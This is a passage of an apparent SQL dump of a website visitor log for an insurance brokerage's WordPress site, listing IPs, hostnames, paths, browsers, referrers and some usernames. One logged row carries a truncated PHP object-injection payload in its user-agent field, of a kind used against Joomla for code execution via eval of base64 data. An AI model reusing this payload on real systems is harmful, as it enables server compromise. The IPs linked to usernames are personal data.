6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1120 x 700','','','','','','0','0',0),(3286,'0b_b28728fe3d21d81162737d5b04eab6e0','1457630237','96.44.145.226','96.44.145.226.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista','Firefox 16','ua','','','','','','','0','0',0),(3288,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630218','198.167.168.70','198.167.168.70','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=empire+insurance+brokerahe&src=IE-TopResult&FORM=IETR02','empire insurance brokerahe',1,'Win7 x64','IE 10','us','1120 x 700','Bing','','','','','0','0',0),(3291,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630268','198.167.168.70','198.167.168.70','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=site:empireins.com+empire insurance brokerahe','site:empireins.com empire insurance brokerahe',1,'Win7 x64','IE 10','us','1120 x 700','Bing','','','','','0','0',0),(3292,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630281','198.167.168.70','198.167.168.70','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=site:empireins.com+empire insurance brokerahe','site:empireins.com empire insurance brokerahe',1,'Win7 x64','IE 10','us','1120 x 700','Bing','','','','','0','0',0),(3295,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630299','198.167.168.70','198.167.168.70','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.bing.com/search?q=site:empireins.com+empire insurance brokerahe','site:empireins.com empire insurance brokerahe',1,'Win7 x64','IE 10','us','1120 x 700','Bing','','','','','0','0',0),(3298,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630332','198.167.168.70','198.167.168.70','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1120 x 700','','','','','','0','0',0),(3300,'0b_5be303a268b8d696a3a8d9de283a46d8','1457630432','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(3303,'0b_5be303a268b8d696a3a8d9de283a46d8','1457630443','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3304,'0b_99e70a8ad41c3b11d9d101d7eeb200a5','1457630457','198.167.168.70','198.167.168.70','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1120 x 700','','','','','','0','0',0),(3306,'0b_1901c50998456823b677f5aa63b7ee4f','1457631582','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(3307,'0b_cfe69da486d882c82d79f58d92e4fd2d','1457632679','192.3.130.105','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(3309,'0b_34e4a8e7d727de914a00cc20295c07b7','1457633042','52.87.189.102','ec2-52-87-189-102.compute-1.amazonaws.com','/robots.txt','btcrawler','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3312,'0b_34e4a8e7d727de914a00cc20295c07b7','1457633043','52.87.189.102','ec2-52-87-189-102.compute-1.amazonaws.com','/contact/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(3313,'0b_13bfcf1ab3b6e55583063254cb483cb6','1457633047','54.84.244.52','ec2-54-84-244-52.compute-1.amazonaws.com','/about-us/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(3315,'0b_e9c35e0a922988579c5227372776deaf','1457633603','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(3318,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633626','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3321,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633627','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3322,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633636','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3324,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633832','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3325,'0b_77c3706212f289caac5cbd8382f66844','1457633896','70.39.157.195','70.39.157.195','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(3328,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633913','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3331,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633925','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3333,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633928','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3336,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633930','108.58.88.178','ool-6c3a58b2.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3337,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633932','108.58.88.178','ool-6c3a58b2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3340,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633933','108.58.88.178','ool-6c3a58b2.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3342,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633935','108.58.88.178','ool-6c3a58b2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3345,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633937','108.58.88.178','ool-6c3a58b2.static.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3346,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633945','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3348,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633945','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3351,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633949','108.58.88.178','ool-6c3a58b2.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3352,'0b_e2356049b55f829a5d52fd074789e3db','1457633952','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(3355,'0b_e1eab446e6ad730d5f454c0a0b411f0c','1457633956','108.58.88.178','ool-6c3a58b2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(3357,'0b_2f369607f9f5ad887c23c8882d619637','1457634718','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(3360,'0b_2f369607f9f5ad887c23c8882d619637','1457634722','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(3363,'0b_23f2998d627f7b12d145e1f4cabaacb1','1457635620','52.33.66.153','ec2-52-33-66-153.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3364,'0b_23f2998d627f7b12d145e1f4cabaacb1','1457635620','52.33.66.153','ec2-52-33-66-153.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3366,'0b_23f2998d627f7b12d145e1f4cabaacb1','1457635621','52.33.66.153','ec2-52-33-66-153.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3369,'0b_23f2998d627f7b12d145e1f4cabaacb1','1457635645','52.33.66.153','ec2-52-33-66-153.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3372,'0b_23f2998d627f7b12d145e1f4cabaacb1','1457635647','52.33.66.153','ec2-52-33-66-153.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3375,'0b_efaf0e9fc81f4b63ceecefbf35853b95','1457635661','93.153.41.222','93-153-41-222.tmcz.cz','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:1182:\\\"eval(base64_decode','','',0,'','','cz','','','Feed Reader','feed reader','','','0','0',0),(3378,'0b_11200dfdc8c688ce7b87db46dea212fd','1457636133','144.76.80.151','static.151.80.76.144.clients.your-server.de','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(3379,'0b_11200dfdc8c688ce7b87db46dea212fd','1457636134','144.76.80.151','static.151.80.76.144.clients.your-server.de','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(3382,'0b_11200dfdc8c688ce7b87db46dea212fd','1457636135','144.76.80.151','static.151.80.76.144.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(3384,'0b_11200dfdc8c688ce7b87db46dea212fd','1457636136','144.76.80.151','static.151.80.76.144.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(3385,'0b_848d66615c5e487d3c02c82f05e50324','1457637608','108.21.81.67','pool-108-21-81-67.nycmny.fios.verizon.net','/carriers/','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(3387,'0b_848d66615c5e487d3c02c82f05e50324','1457637623','108.21.81.67','pool-108-21-81-67.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win10','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(3390,'0b_6052db619431517bb217b18efc8f63b9','1457638483','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','0',0),(3391,'0b_6052db619431517bb217b18efc8f63b9','1457638485','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','0',0),(3394,'0b_6052db619431517bb217b18efc8f63b9','1457638663','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','0',0),(3396,'0b_6052db619431517bb217b18efc8f63b9','1457638664','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','0',0),(3397,'0b_36a072a2a2ad6d6ec32f6246e828a39e','1457638728','172.58.96.52','172.58.96.52','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(3399,'0b_36a072a2a2ad6d6ec32f6246e828a39e','1457638740','172.58.96.52','172.58.96.52','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(3402,'0b_36a072a2a2ad6d6ec32f6246e828a39e','1457638769','172.58.96.52','172.58.96.52','/contact/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(3403,'0b_36a072a2a2ad6d6ec32f6246e828a39e','1457638785','172.58.96.52','172.58.96.52','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/contact/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(3406,'0b_36a072a2a2ad6d6ec32f6246e828a39e','1457638786','172.58.96.52','172.58.96.52','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T1 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(3408,'0b_6052db619431517bb217b18efc8f63b9','1457638907','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3411,'0b_6052db619431517bb217b18efc8f63b9','1457638981','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3414,'0b_6052db619431517bb217b18efc8f63b9','1457639001','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3417,'0b_6052db619431517bb217b18efc8f63b9','1457639031','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','169',0),(3418,'0b_6052db619431517bb217b18efc8f63b9','1457639032','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3420,'0b_6052db619431517bb217b18efc8f63b9','1457639038','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3423,'0b_6052db619431517bb217b18efc8f63b9','1457639046','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3424,'0b_6052db619431517bb217b18efc8f63b9','1457639046','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','0',0),(3427,'0b_6052db619431517bb217b18efc8f63b9','1457639050','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','3','51',0),(3429,'0b_6052db619431517bb217b18efc8f63b9','1457639075','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','51',0),(3432,'0b_6052db619431517bb217b18efc8f63b9','1457639101','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/wp-admin/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/case-status/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','0',0),(3433,'0b_6052db619431517bb217b18efc8f63b9','1457639105','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/wp-admin/admin-ajax.php?action=dashboard-widgets&widget=dashboard_primary&pagenow=dashboard','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/wp-admin/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','0',0),(3435,'0b_6052db619431517bb217b18efc8f63b9','1457639109','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/wp-admin/profile.php','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/wp-admin/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','0',0),(3436,'0b_6052db619431517bb217b18efc8f63b9','1457639115','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/wp-admin/profile.php','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','51',0),(3439,'0b_6052db619431517bb217b18efc8f63b9','1457639115','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','0',0),(3442,'0b_6052db619431517bb217b18efc8f63b9','1457639117','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','51',0),(3444,'0b_6052db619431517bb217b18efc8f63b9','1457639127','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','51',0),(3445,'0b_2d30a747220c81469501ed868a8da4be','1457639196','66.249.73.169','crawl-66-249-73-169.googlebot.com','/members/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3448,'0b_81d4898fe95662ca3841c46818e3fc04','1457639975','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win7','Chrome 32','us','','','','','','','0','0',0),(3450,'0b_fd43f882aeb6de555f5184feed6cc08e','1457640616','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(3451,'0b_fd43f882aeb6de555f5184feed6cc08e','1457640628','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(3453,'0b_fd43f882aeb6de555f5184feed6cc08e','1457640630','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 32','us','1600 x 900','','','','','','0','0',0),(3456,'0b_6052db619431517bb217b18efc8f63b9','1457640993','108.29.136.102','static-108-29-136-102.nycmny.fios.verizon.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','fully10952','','0','51',0),(3457,'0b_864d524916e4d4dedd1cf77fa57c2554','1457641930','96.224.199.60','pool-96-224-199-60.nycmny.fios.verizon.net','/wp-admin/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'WinVista','Chrome 48','us','','','','','','','0','0',0),(3460,'0b_b2716ff8b1cb13d105f28b1d69fbfec3','1457641930','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3463,'0b_b2716ff8b1cb13d105f28b1d69fbfec3','1457641933','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(3465,'0b_b2716ff8b1cb13d105f28b1d69fbfec3','1457641940','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1920 x 